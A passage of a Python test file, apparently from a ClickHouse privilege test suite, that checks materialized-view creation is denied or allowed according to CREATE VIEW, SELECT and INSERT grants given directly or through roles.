    """Grant then revoke CREATE VIEW and verify the create attempt is denied."""
    view_name = f"view_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    node = self.context.node if node is None else node
    create_query = f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
    with When("I grant CREATE VIEW privilege"):
        node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
    with And("I revoke CREATE VIEW privilege"):
        node.query(f"REVOKE CREATE VIEW ON {view_name} FROM {grant_target_name}")
    with Then("I try to create a view on the table as the user"):
        node.query(
            create_query,
            settings=[("user", f"{user_name}")],
            exitcode=exitcode,
            message=message,
        )
@TestScenario
def create_without_source_table_privilege(self, node=None):
    """Negative check: CREATE VIEW alone is not enough — the user also needs
    SELECT on the source table.
    """
    user_name = f"user_{getuid()}"
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    if node is None:
        node = self.context.node
    # Combine the table and user fixtures into a single with-statement.
    with table(node, f"{table_name}"), user(node, f"{user_name}"):
        with When("I grant CREATE VIEW privilege to a user"):
            node.query(f"GRANT CREATE VIEW ON {view_name} TO {user_name}")
        with Then("I try to create a view without select privilege on the table"):
            node.query(
                f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}",
                settings=[("user", f"{user_name}")],
                exitcode=exitcode,
                message=message,
            )
@TestScenario
def create_with_source_table_privilege_granted_directly_or_via_role(self, node=None):
    """Run the source-table outline twice: CREATE VIEW + SELECT granted
    directly, then granted through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    with user(node, f"{user_name}"):
        direct = Scenario(
            test=create_with_source_table_privilege,
            name="create with create view and select privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=create_with_source_table_privilege,
            name="create with create view and select privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_source_table_privilege(self, user_name, grant_target_name, node=None):
    """With CREATE VIEW plus SELECT on the source table, the user can create
    the view; the new view must be empty.
    """
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"
    node = self.context.node if node is None else node
    with table(node, f"{table_name}"):
        try:
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
            with And("I grant SELECT privilege"):
                node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
            with And("I try to create a view on the table as the user"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}",
                    settings=[("user", f"{user_name}")],
                )
            with Then("I check the view"):
                row_count = node.query(f"SELECT count(*) FROM {view_name}").output
                assert row_count == "0", error()
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_subquery_privilege_granted_directly_or_via_role(self, node=None):
    """Run the subquery outline twice: SELECT privileges granted directly,
    then granted through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    with user(node, f"{user_name}"):
        direct = Scenario(
            test=create_with_subquery,
            name="create with subquery, privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=create_with_subquery,
            name="create with subquery, privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_subquery(self, user_name, grant_target_name, node=None):
    """Grant select and create view privileges and check that user is able to create a view
    if and only if they have all necessary privileges.
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # Stored query has two nested IN-subqueries over three tables; the user
    # needs SELECT on all three for the CREATE to succeed.
    create_view_query = "CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table2_name} WHERE y<2))"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name},{table2_name}"):
        try:
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
            # With CREATE VIEW only (no SELECT yet), the create must be denied.
            with Then("I attempt to CREATE VIEW as the user with create privilege"):
                node.query(
                    create_view_query.format(
                        view_name=view_name,
                        table0_name=table0_name,
                        table1_name=table1_name,
                        table2_name=table2_name,
                    ),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # Each permutation grants SELECT on a strict subset of the three
            # tables — every partial grant must still be denied.
            for permutation in permutations(table_count=3):
                with grant_select_on_table(
                    node,
                    permutation,
                    grant_target_name,
                    table0_name,
                    table1_name,
                    table2_name,
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Given("I don't have a view"):
                            node.query(f"DROP VIEW IF EXISTS {view_name}")
                        with Then("I attempt to create a view as the user"):
                            node.query(
                                create_view_query.format(
                                    view_name=view_name,
                                    table0_name=table0_name,
                                    table1_name=table1_name,
                                    table2_name=table2_name,
                                ),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )
            # Only with SELECT on ALL tables (the value past the last
            # permutation acts as the all-tables bitmask) may the create succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=3)) + 1,
                    grant_target_name,
                    table0_name,
                    table1_name,
                    table2_name,
                ):
                    with Given("I don't have a view"):
                        node.query(f"DROP VIEW IF EXISTS {view_name}")
                    with Then("I attempt to create a view as the user"):
                        node.query(
                            create_view_query.format(
                                view_name=view_name,
                                table0_name=table0_name,
                                table1_name=table1_name,
                                table2_name=table2_name,
                            ),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_join_query_privilege_granted_directly_or_via_role(self, node=None):
    """Run the JOIN-query outline twice: SELECT privileges granted directly,
    then granted through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    with user(node, f"{user_name}"):
        direct = Scenario(
            test=create_with_join_query,
            name="create with join query, privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=create_with_join_query,
            name="create with join query, privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_join_query(self, grant_target_name, user_name, node=None):
    """Grant select and create view privileges and check that user is able to create a view
    if and only if they have all necessary privileges.
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # Stored query JOINs two tables; the user needs SELECT on both.
    create_view_query = "CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} JOIN {table1_name} USING d"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name}"):
        try:
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
            # With CREATE VIEW only (no SELECT yet), the create must be denied.
            with Then("I attempt to create view as the user"):
                node.query(
                    create_view_query.format(
                        view_name=view_name,
                        table0_name=table0_name,
                        table1_name=table1_name,
                    ),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # Each permutation grants SELECT on a strict subset of the two
            # tables — every partial grant must still be denied.
            for permutation in permutations(table_count=2):
                with grant_select_on_table(
                    node, permutation, grant_target_name, table0_name, table1_name
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Given("I don't have a view"):
                            node.query(f"DROP VIEW IF EXISTS {view_name}")
                        with Then("I attempt to create a view as the user"):
                            node.query(
                                create_view_query.format(
                                    view_name=view_name,
                                    table0_name=table0_name,
                                    table1_name=table1_name,
                                ),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )
            # Only with SELECT on ALL tables (the value past the last
            # permutation acts as the all-tables bitmask) may the create succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=2)) + 1,
                    grant_target_name,
                    table0_name,
                    table1_name,
                ):
                    with Given("I don't have a view"):
                        node.query(f"DROP VIEW IF EXISTS {view_name}")
                    with Then("I attempt to create a view as the user"):
                        node.query(
                            create_view_query.format(
                                view_name=view_name,
                                table0_name=table0_name,
                                table1_name=table1_name,
                            ),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            with Then("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_union_query_privilege_granted_directly_or_via_role(self, node=None):
    """Run the UNION-query outline twice: SELECT privileges granted directly,
    then granted through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    with user(node, f"{user_name}"):
        direct = Scenario(
            test=create_with_union_query,
            name="create with union query, privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=create_with_union_query,
            name="create with union query, privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_union_query(self, grant_target_name, user_name, node=None):
    """Grant select and create view privileges and check that user is able to create a view
    if and only if they have all necessary privileges.

    :param grant_target_name: user or role that receives the privileges
    :param user_name: user that executes the CREATE queries
    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # The stored query reads from both tables via UNION ALL, so SELECT is
    # required on each of them in addition to CREATE VIEW.
    create_view_query = "CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} UNION ALL SELECT * FROM {table1_name}"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name}"):
        try:
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
            # CREATE VIEW alone must not be enough: creation is rejected.
            with Then("I attempt to create view as the user"):
                node.query(
                    create_view_query.format(
                        view_name=view_name,
                        table0_name=table0_name,
                        table1_name=table1_name,
                    ),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # Each permutation grants SELECT on a partial subset of the listed
            # tables (see grant_select_on_table); creation must still fail.
            for permutation in permutations(table_count=2):
                with grant_select_on_table(
                    node, permutation, grant_target_name, table0_name, table1_name
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Given("I don't have a view"):
                            node.query(f"DROP VIEW IF EXISTS {view_name}")
                        with Then("I attempt to create a view as the user"):
                            node.query(
                                create_view_query.format(
                                    view_name=view_name,
                                    table0_name=table0_name,
                                    table1_name=table1_name,
                                ),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )
            # max(permutations(...)) + 1 presumably selects every listed table
            # (TODO confirm against grant_select_on_table); with SELECT on all
            # tables the creation must now succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=2)) + 1,
                    grant_target_name,
                    table0_name,
                    table1_name,
                ):
                    with Given("I don't have a view"):
                        node.query(f"DROP VIEW IF EXISTS {view_name}")
                    with Then("I attempt to create a view as the user"):
                        node.query(
                            create_view_query.format(
                                view_name=view_name,
                                table0_name=table0_name,
                                table1_name=table1_name,
                            ),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_join_union_subquery_privilege_granted_directly_or_via_role(
    self, node=None
):
    """Check that user is able to create a view with a stored query that includes `UNION ALL`, `JOIN` and two subqueries
    if and only if the user has SELECT privilege on all of the tables, either granted directly or through a role.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    # getuid() suffixes keep object names unique across repeated runs.
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Case 1: privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(
            test=create_with_join_union_subquery,
            name="create with join union subquery, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)
    # Case 2: privileges granted to a role that is granted to the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=create_with_join_union_subquery,
            name="create with join union subquery, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_join_union_subquery(self, grant_target_name, user_name, node=None):
    """Grant select and create view privileges and check that user is able to create a view
    if and only if they have all necessary privileges.

    :param grant_target_name: user or role that receives the privileges
    :param user_name: user that executes the CREATE queries
    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    table3_name = f"table3_{getuid()}"
    table4_name = f"table4_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # NOTE(review): the stored query references table0, table1 (twice), table3
    # and table4 but never table2; str.format silently ignores the extra
    # table2_name keyword below. Confirm whether table2 was meant to appear.
    create_view_query = "CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT y FROM {table0_name} JOIN {table1_name} USING y UNION ALL SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table3_name} WHERE y IN (SELECT y FROM {table4_name} WHERE y<2))"
    if node is None:
        node = self.context.node
    with table(
        node, f"{table0_name},{table1_name},{table2_name},{table3_name},{table4_name}"
    ):
        with user(node, f"{user_name}"):
            try:
                with When("I grant CREATE VIEW privilege"):
                    node.query(
                        f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}"
                    )
                # CREATE VIEW alone must not be enough: creation is rejected.
                with Then(
                    "I attempt to create view as the user with CREATE VIEW privilege"
                ):
                    node.query(
                        create_view_query.format(
                            view_name=view_name,
                            table0_name=table0_name,
                            table1_name=table1_name,
                            table2_name=table2_name,
                            table3_name=table3_name,
                            table4_name=table4_name,
                        ),
                        settings=[("user", f"{user_name}")],
                        exitcode=exitcode,
                        message=message,
                    )
                # NOTE(review): permutations(table_count=5) is iterated but only
                # four tables are passed to grant_select_on_table here —
                # confirm this matches the helper's expectations.
                for permutation in permutations(table_count=5):
                    with grant_select_on_table(
                        node,
                        permutation,
                        grant_target_name,
                        table0_name,
                        table1_name,
                        table3_name,
                        table4_name,
                    ) as tables_granted:
                        with When(
                            f"permutation={permutation}, tables granted = {tables_granted}"
                        ):
                            with Given("I don't have a view"):
                                node.query(f"DROP VIEW IF EXISTS {view_name}")
                            with Then("I attempt to create a view as the user"):
                                node.query(
                                    create_view_query.format(
                                        view_name=view_name,
                                        table0_name=table0_name,
                                        table1_name=table1_name,
                                        table2_name=table2_name,
                                        table3_name=table3_name,
                                        table4_name=table4_name,
                                    ),
                                    settings=[("user", f"{user_name}")],
                                    exitcode=exitcode,
                                    message=message,
                                )
                # With SELECT granted on every table the creation must succeed.
                with When("I grant select on all tables"):
                    with grant_select_on_table(
                        node,
                        max(permutations(table_count=5)) + 1,
                        grant_target_name,
                        table0_name,
                        table1_name,
                        table2_name,
                        table3_name,
                        table4_name,
                    ):
                        with Given("I don't have a view"):
                            node.query(f"DROP VIEW IF EXISTS {view_name}")
                        with Then("I attempt to create a view as the user"):
                            node.query(
                                create_view_query.format(
                                    view_name=view_name,
                                    table0_name=table0_name,
                                    table1_name=table1_name,
                                    table2_name=table2_name,
                                    table3_name=table3_name,
                                    table4_name=table4_name,
                                ),
                                settings=[("user", f"{user_name}")],
                            )
            finally:
                with Finally("I drop the view"):
                    node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_nested_views_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to create a view with a stored query that includes other views if and only if
    they have SELECT privilege on all the views and the source tables for those views.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    # getuid() suffixes keep object names unique across repeated runs.
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Case 1: privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(
            test=create_with_nested_views,
            name="create with nested views, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)
    # Case 2: privileges granted to a role that is granted to the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=create_with_nested_views,
            name="create with nested views, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_nested_views(self, grant_target_name, user_name, node=None):
    """Grant SELECT and CREATE VIEW privileges and check that user is able to create a view
    if and only if they have all necessary privileges.

    :param grant_target_name: user or role that receives the privileges
    :param user_name: user that executes the CREATE queries
    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    view0_name = f"view0_{getuid()}"
    view1_name = f"view1_{getuid()}"
    view2_name = f"view2_{getuid()}"
    view3_name = f"view3_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    table3_name = f"table3_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # view3 reads table3 directly and view2 indirectly; view2 pulls in view1,
    # view0 and their source tables, so SELECT is needed on the whole chain.
    create_view_query = "CREATE MATERIALIZED VIEW {view3_name} ENGINE = Memory AS SELECT y FROM {table3_name} UNION ALL SELECT y FROM {view2_name}"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name}"):
        try:
            with Given("I have some views"):
                node.query(
                    f"CREATE MATERIALIZED VIEW {view0_name} ENGINE = Memory AS SELECT y FROM {table0_name}"
                )
                node.query(
                    f"CREATE MATERIALIZED VIEW {view1_name} ENGINE = Memory AS SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {view0_name} WHERE y<2)"
                )
                node.query(
                    f"CREATE MATERIALIZED VIEW {view2_name} ENGINE = Memory AS SELECT y FROM {table2_name} JOIN {view1_name} USING y"
                )
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view3_name} TO {grant_target_name}")
            # CREATE VIEW alone must not be enough: creation is rejected.
            with Then(
                "I attempt to create view as the user with CREATE VIEW privilege"
            ):
                node.query(
                    create_view_query.format(
                        view3_name=view3_name,
                        view2_name=view2_name,
                        table3_name=table3_name,
                    ),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # Normal runs check a curated list of partial-grant permutations;
            # stress runs (self.context.stress truthy) check every subset of
            # the seven objects.
            for permutation in (
                [0, 1, 2, 3, 7, 11, 15, 31, 39, 79, 95],
                permutations(table_count=7),
            )[self.context.stress]:
                with grant_select_on_table(
                    node,
                    permutation,
                    grant_target_name,
                    view2_name,
                    table3_name,
                    view1_name,
                    table2_name,
                    view0_name,
                    table1_name,
                    table0_name,
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Given("I don't have a view"):
                            node.query(f"DROP VIEW IF EXISTS {view3_name}")
                        with Then("I attempt to create a view as the user"):
                            node.query(
                                create_view_query.format(
                                    view3_name=view3_name,
                                    view2_name=view2_name,
                                    table3_name=table3_name,
                                ),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )
            # With SELECT granted on every view and table, creation succeeds.
            with When("I grant select on all views"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=7)) + 1,
                    grant_target_name,
                    view0_name,
                    view1_name,
                    view2_name,
                    table0_name,
                    table1_name,
                    table2_name,
                    table3_name,
                ):
                    with Given("I don't have a view"):
                        node.query(f"DROP VIEW IF EXISTS {view3_name}")
                    with Then("I attempt to create a view as the user"):
                        node.query(
                            create_view_query.format(
                                view3_name=view3_name,
                                view2_name=view2_name,
                                table3_name=table3_name,
                            ),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            # Drop in reverse creation order so dependent views go first.
            # Fixed: the step labels previously said view0..view3 while the
            # queries dropped view3..view0, making failure logs misleading.
            with Finally("I drop the views"):
                with When("I drop view3", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view3_name}")
                with And("I drop view2", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view2_name}")
                with And("I drop view1", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view1_name}")
                with And("I drop view0", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view0_name}")
@TestScenario
def create_with_target_table_privilege_directly_or_via_role(self, node=None):
    """Check that user is able to create a materialized view with a target table if and only if
    the user has CREATE VIEW privilege and SELECT and INSERT privileges on the target table.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    # getuid() suffixes keep object names unique across repeated runs.
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Case 1: privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(
            test=create_with_target_table,
            name="create with target table, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)
    # Case 2: privileges granted to a role that is granted to the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=create_with_target_table,
            name="create with target table, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_target_table(self, grant_target_name, user_name, node=None):
    """Check that user is unable to create a view without INSERT and SELECT privileges and is able to once both are granted.

    :param grant_target_name: user or role that receives the privileges
    :param user_name: user that executes the CREATE queries
    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    if node is None:
        node = self.context.node
    with table(node, f"{table_name}"):
        try:
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
            # CREATE VIEW only: rejected.
            with Then("I attempt to create a view as the user"):
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1",
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # CREATE VIEW + SELECT on target table only: still rejected.
            with When("I grant SELECT on the target table"):
                node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
            with Then("I attempt to create a view as the user"):
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1",
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # CREATE VIEW + INSERT only (SELECT revoked): still rejected.
            with When("I revoke SELECT on the target table"):
                node.query(f"REVOKE SELECT ON {table_name} FROM {grant_target_name}")
            with And("I grant INSERT privilege on the target table"):
                node.query(f"GRANT INSERT ON {table_name} TO {grant_target_name}")
            with Then("I attempt to create a view as the user"):
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1",
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # SELECT and INSERT both granted: creation succeeds.
            with When("I grant SELECT on the target table"):
                node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
            with Then("I successfully create a view as the user"):
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1",
                    settings=[("user", f"{user_name}")],
                )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_populate_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to create a view with POPULATE specified if and only if
    they have CREATE VIEW and INSERT privileges for the view, either directly or from a role.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    # getuid() suffixes keep object names unique across repeated runs.
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Case 1: privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(
            test=create_with_populate,
            name="create with populate privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)
    # Case 2: privileges granted to a role that is granted to the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=create_with_populate,
            name="create with populate privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_populate(self, user_name, grant_target_name, node=None):
    """Check that user is only able to create the view after INSERT privilege is granted.

    :param user_name: user that executes the CREATE queries
    :param grant_target_name: user or role that receives the privileges
    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    view_name = f"view_{getuid()}"
    # (Removed unused ``table_name`` local — this outline uses no source table.)
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    if node is None:
        node = self.context.node
    try:
        with When("I grant CREATE VIEW privilege"):
            node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
        # CREATE VIEW alone is rejected: POPULATE also needs INSERT on the view.
        with Then("I attempt to create a view as the user"):
            node.query(
                f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory POPULATE AS SELECT 1",
                settings=[("user", f"{user_name}")],
                exitcode=exitcode,
                message=message,
            )
        # With INSERT granted on the view, the same CREATE must succeed.
        with When("I grant INSERT privilege on the view"):
            node.query(f"GRANT INSERT ON {view_name} TO {grant_target_name}")
        with Given("I don't have a view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
        with Then("I attempt to create a view as the user"):
            node.query(
                f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory POPULATE AS SELECT 1",
                settings=[("user", f"{user_name}")],
            )
    finally:
        with Finally("I drop the view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_populate_source_table_privilege_granted_directly_or_via_role(
    self, node=None
):
    """Check that user is able to create a view with POPULATE and a source table specified if and only if
    they have CREATE VIEW and INSERT privileges for the view, either directly or from a role.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    # getuid() suffixes keep object names unique across repeated runs.
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Case 1: privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(
            test=create_with_populate_source_table,
            name="create with populate and source table, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)
    # Case 2: privileges granted to a role that is granted to the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=create_with_populate_source_table,
            name="create with populate and source table, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_populate_source_table(self, user_name, grant_target_name, node=None):
    """Check that user is only able to create the view after INSERT privilege is granted.

    :param user_name: user that executes the CREATE queries
    :param grant_target_name: user or role that receives the privileges
    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    if node is None:
        node = self.context.node
    with table(node, f"{table_name}"):
        try:
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
            # CREATE VIEW only: rejected.
            with Then("I attempt to create a view as the user"):
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory POPULATE AS SELECT * FROM {table_name}",
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            with When("I grant SELECT privilege on the source table"):
                # Fixed: grant to grant_target_name (user OR role) rather than
                # always directly to the user, so the "via role" variant of
                # this outline actually exercises the role-granted path, in
                # line with the sibling outlines.
                node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
            # SELECT on the source table but no INSERT on the view: rejected.
            with Then("I attempt to create a view as the user"):
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory POPULATE AS SELECT * FROM {table_name}",
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # With INSERT granted on the view, the CREATE must succeed.
            with When("I grant INSERT privilege on the view"):
                node.query(f"GRANT INSERT ON {view_name} TO {grant_target_name}")
            with Given("I don't have a view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
            with Then("I attempt to create a view as the user"):
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory POPULATE AS SELECT * FROM {table_name}",
